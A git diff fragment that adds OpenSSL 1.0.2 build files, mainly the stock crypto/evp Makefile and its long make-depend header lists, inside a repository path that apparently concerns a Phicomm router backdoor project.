+pmeth_fn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pmeth_fn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pmeth_fn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+pmeth_fn.o: ../../include/openssl/symhacks.h ../cryptlib.h evp_locl.h
+pmeth_fn.o: pmeth_fn.c
+pmeth_gn.o: ../../e_os.h ../../include/openssl/asn1.h
+pmeth_gn.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+pmeth_gn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+pmeth_gn.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pmeth_gn.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pmeth_gn.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pmeth_gn.o: ../../include/openssl/opensslconf.h
+pmeth_gn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pmeth_gn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+pmeth_gn.o: ../../include/openssl/symhacks.h ../cryptlib.h evp_locl.h
+pmeth_gn.o: pmeth_gn.c
+pmeth_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+pmeth_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pmeth_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pmeth_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pmeth_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pmeth_lib.o: ../../include/openssl/objects.h
+pmeth_lib.o: ../../include/openssl/opensslconf.h
+pmeth_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pmeth_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+pmeth_lib.o: ../../include/openssl/symhacks.h ../asn1/asn1_locl.h ../cryptlib.h
+pmeth_lib.o: evp_locl.h pmeth_lib.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/Makefile.bak
new file mode 100644
index 0000000..842f473
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/Makefile.bak
@@ -0,0 +1,736 @@
+#
+# OpenSSL/crypto/evp/Makefile
+#
+
+DIR=	evp
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=evp_test.c
+TESTDATA=evptests.txt
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= encode.c digest.c evp_enc.c evp_key.c evp_acnf.c evp_cnf.c \
+	e_des.c e_bf.c e_idea.c e_des3.c e_camellia.c\
+	e_rc4.c e_aes.c names.c e_seed.c \
+	e_xcbc_d.c e_rc2.c e_cast.c e_rc5.c \
+	m_null.c m_md2.c m_md4.c m_md5.c m_sha.c m_sha1.c m_wp.c \
+	m_dss.c m_dss1.c m_mdc2.c m_ripemd.c m_ecdsa.c\
+	p_open.c p_seal.c p_sign.c p_verify.c p_lib.c p_enc.c p_dec.c \
+	bio_md.c bio_b64.c bio_enc.c evp_err.c e_null.c \
+	c_all.c c_allc.c c_alld.c evp_lib.c bio_ok.c \
+	evp_pkey.c evp_pbe.c p5_crpt.c p5_crpt2.c \
+	e_old.c pmeth_lib.c pmeth_fn.c pmeth_gn.c m_sigver.c \
+	e_aes_cbc_hmac_sha1.c e_aes_cbc_hmac_sha256.c e_rc4_hmac_md5.c
+
+LIBOBJ=	encode.o digest.o evp_enc.o evp_key.o evp_acnf.o evp_cnf.o \
+	e_des.o e_bf.o e_idea.o e_des3.o e_camellia.o\
+	e_rc4.o e_aes.o names.o e_seed.o \
+	e_xcbc_d.o e_rc2.o e_cast.o e_rc5.o \
+	m_null.o m_md2.o m_md4.o m_md5.o m_sha.o m_sha1.o m_wp.o \
+	m_dss.o m_dss1.o m_mdc2.o m_ripemd.o m_ecdsa.o\
+	p_open.o p_seal.o p_sign.o p_verify.o p_lib.o p_enc.o p_dec.o \
+	bio_md.o bio_b64.o bio_enc.o evp_err.o e_null.o \
+	c_all.o c_allc.o c_alld.o evp_lib.o bio_ok.o \
+	evp_pkey.o evp_pbe.o p5_crpt.o p5_crpt2.o \
+	e_old.o pmeth_lib.o pmeth_fn.o pmeth_gn.o m_sigver.o \
+	e_aes_cbc_hmac_sha1.o e_aes_cbc_hmac_sha256.o e_rc4_hmac_md5.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= evp.h
+HEADER=	evp_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@[ -f $(TESTDATA) ] && cp $(TESTDATA) ../../test && echo "$(TESTDATA) -> ../../test/$(TESTDATA)"
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+bio_b64.o: ../../e_os.h ../../include/openssl/asn1.h
+bio_b64.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+bio_b64.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bio_b64.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+bio_b64.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+bio_b64.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+bio_b64.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_b64.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_b64.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_b64.c
+bio_enc.o: ../../e_os.h ../../include/openssl/asn1.h
+bio_enc.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+bio_enc.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bio_enc.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+bio_enc.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+bio_enc.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+bio_enc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_enc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_enc.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_enc.c
+bio_md.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+bio_md.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bio_md.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_md.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+bio_md.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+bio_md.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bio_md.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+bio_md.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bio_md.o: ../cryptlib.h bio_md.c
+bio_ok.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+bio_ok.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bio_ok.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_ok.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+bio_ok.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+bio_ok.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bio_ok.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+bio_ok.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_ok.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_ok.c
+c_all.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+c_all.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+c_all.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+c_all.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+c_all.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+c_all.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+c_all.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+c_all.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+c_all.o: ../cryptlib.h c_all.c
+c_allc.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+c_allc.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+c_allc.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+c_allc.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+c_allc.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+c_allc.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+c_allc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs12.h
+c_allc.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+c_allc.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+c_allc.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+c_allc.o: ../../include/openssl/x509_vfy.h ../cryptlib.h c_allc.c
+c_alld.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+c_alld.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+c_alld.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+c_alld.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+c_alld.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+c_alld.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+c_alld.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs12.h
+c_alld.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+c_alld.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+c_alld.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+c_alld.o: ../../include/openssl/x509_vfy.h ../cryptlib.h c_alld.c
+digest.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+digest.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+digest.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+digest.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+digest.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+digest.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+digest.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+digest.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+digest.o: ../cryptlib.h digest.c
+e_aes.o: ../../include/openssl/aes.h ../../include/openssl/asn1.h
+e_aes.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+e_aes.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_aes.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_aes.o: ../../include/openssl/modes.h ../../include/openssl/obj_mac.h
+e_aes.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+e_aes.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_aes.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+e_aes.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+e_aes.o: ../modes/modes_lcl.h e_aes.c evp_locl.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/aes.h ../../include/openssl/asn1.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/bio.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/crypto.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/e_os2.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/evp.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/modes.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/obj_mac.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/objects.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/opensslconf.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/opensslv.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/ossl_typ.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/rand.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/safestack.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/sha.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/stack.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/symhacks.h ../modes/modes_lcl.h
+e_aes_cbc_hmac_sha1.o: e_aes_cbc_hmac_sha1.c
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/aes.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/asn1.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/bio.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/crypto.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/e_os2.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/evp.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/modes.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/obj_mac.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/objects.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/opensslconf.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/opensslv.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/ossl_typ.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/rand.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/safestack.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/sha.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/stack.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/symhacks.h ../modes/modes_lcl.h
+e_aes_cbc_hmac_sha256.o: e_aes_cbc_hmac_sha256.c
+e_bf.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_bf.o: ../../include/openssl/blowfish.h ../../include/openssl/buffer.h
+e_bf.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+e_bf.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+e_bf.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+e_bf.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+e_bf.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_bf.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_bf.o: ../../include/openssl/symhacks.h ../cryptlib.h e_bf.c evp_locl.h
+e_camellia.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_camellia.o: ../../include/openssl/camellia.h ../../include/openssl/crypto.h
+e_camellia.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_camellia.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_camellia.o: ../../include/openssl/modes.h ../../include/openssl/obj_mac.h
+e_camellia.o: ../../include/openssl/objects.h
+e_camellia.o: ../../include/openssl/opensslconf.h
+e_camellia.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_camellia.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_camellia.o: ../../include/openssl/symhacks.h ../modes/modes_lcl.h
+e_camellia.o: e_camellia.c evp_locl.h
+e_cast.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_cast.o: ../../include/openssl/buffer.h ../../include/openssl/cast.h
+e_cast.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+e_cast.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+e_cast.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+e_cast.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+e_cast.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_cast.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_cast.o: ../../include/openssl/symhacks.h ../cryptlib.h e_cast.c evp_locl.h
+e_des.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_des.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_des.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+e_des.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_des.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_des.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+e_des.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+e_des.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+e_des.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_des.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+e_des.o: ../../include/openssl/ui_compat.h ../cryptlib.h e_des.c evp_locl.h
+e_des3.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_des3.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_des3.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+e_des3.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_des3.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_des3.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+e_des3.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+e_des3.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+e_des3.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+e_des3.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+e_des3.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+e_des3.o: ../cryptlib.h e_des3.c evp_locl.h
+e_idea.o: ../../e_os.h ../../include/openssl/bio.h
+e_idea.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_idea.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_idea.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+e_idea.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_idea.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_idea.o: ../../include/openssl/symhacks.h ../cryptlib.h e_idea.c
+e_null.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_null.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_null.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_null.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+e_null.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+e_null.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+e_null.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+e_null.o: ../cryptlib.h e_null.c
+e_rc2.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_rc2.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_rc2.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_rc2.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_rc2.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+e_rc2.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+e_rc2.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rc2.h
+e_rc2.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_rc2.o: ../../include/openssl/symhacks.h ../cryptlib.h e_rc2.c evp_locl.h
+e_rc4.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_rc4.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_rc4.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_rc4.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_rc4.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+e_rc4.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+e_rc4.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rc4.h
+e_rc4.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_rc4.o: ../../include/openssl/symhacks.h ../cryptlib.h e_rc4.c evp_locl.h
+e_rc4_hmac_md5.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_rc4_hmac_md5.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+e_rc4_hmac_md5.o: ../../include/openssl/evp.h ../../include/openssl/md5.h
+e_rc4_hmac_md5.o: ../../include/openssl/obj_mac.h
+e_rc4_hmac_md5.o: ../../include/openssl/objects.h
+e_rc4_hmac_md5.o: ../../include/openssl/opensslconf.h
+e_rc4_hmac_md5.o: ../../include/openssl/opensslv.h
+e_rc4_hmac_md5.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rc4.h
+e_rc4_hmac_md5.o: ../../include/openssl/safestack.h
+e_rc4_hmac_md5.o: ../../include/openssl/stack.h
+e_rc4_hmac_md5.o: ../../include/openssl/symhacks.h e_rc4_hmac_md5.c
+e_rc5.o: ../../e_os.h ../../include/openssl/bio.h
+e_rc5.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_rc5.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_rc5.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+e_rc5.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_rc5.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_rc5.o: ../../include/openssl/symhacks.h ../cryptlib.h e_rc5.c
+e_seed.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_seed.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+e_seed.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+e_seed.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+e_seed.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+e_seed.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_seed.o: ../../include/openssl/safestack.h ../../include/openssl/seed.h
+e_seed.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+e_seed.o: e_seed.c evp_locl.h
+e_xcbc_d.o: ../../e_os.h ../../include/openssl/asn1.h
+e_xcbc_d.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+e_xcbc_d.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+e_xcbc_d.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+e_xcbc_d.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+e_xcbc_d.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+e_xcbc_d.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+e_xcbc_d.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_xcbc_d.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_xcbc_d.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+e_xcbc_d.o: ../../include/openssl/ui_compat.h ../cryptlib.h e_xcbc_d.c
+e_xcbc_d.o: evp_locl.h
+encode.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+encode.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+encode.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+encode.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+encode.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+encode.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+encode.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+encode.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+encode.o: ../cryptlib.h encode.c
+evp_acnf.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_acnf.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+evp_acnf.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+evp_acnf.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+evp_acnf.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+evp_acnf.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+evp_acnf.o: ../../include/openssl/opensslconf.h
+evp_acnf.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_acnf.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+evp_acnf.o: ../../include/openssl/symhacks.h ../cryptlib.h evp_acnf.c
+evp_cnf.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_cnf.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+evp_cnf.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+evp_cnf.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+evp_cnf.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+evp_cnf.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+evp_cnf.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+evp_cnf.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_cnf.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+evp_cnf.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+evp_cnf.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+evp_cnf.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+evp_cnf.o: ../cryptlib.h evp_cnf.c
+evp_enc.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_enc.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+evp_enc.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+evp_enc.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+evp_enc.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+evp_enc.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+evp_enc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_enc.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+evp_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+evp_enc.o: ../cryptlib.h evp_enc.c evp_locl.h
+evp_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+evp_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+evp_err.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+evp_err.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+evp_err.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+evp_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+evp_err.o: ../../include/openssl/symhacks.h evp_err.c
+evp_key.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_key.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+evp_key.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+evp_key.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+evp_key.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+evp_key.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+evp_key.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_key.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+evp_key.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+evp_key.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+evp_key.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+evp_key.o: ../cryptlib.h evp_key.c
+evp_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+evp_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+evp_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
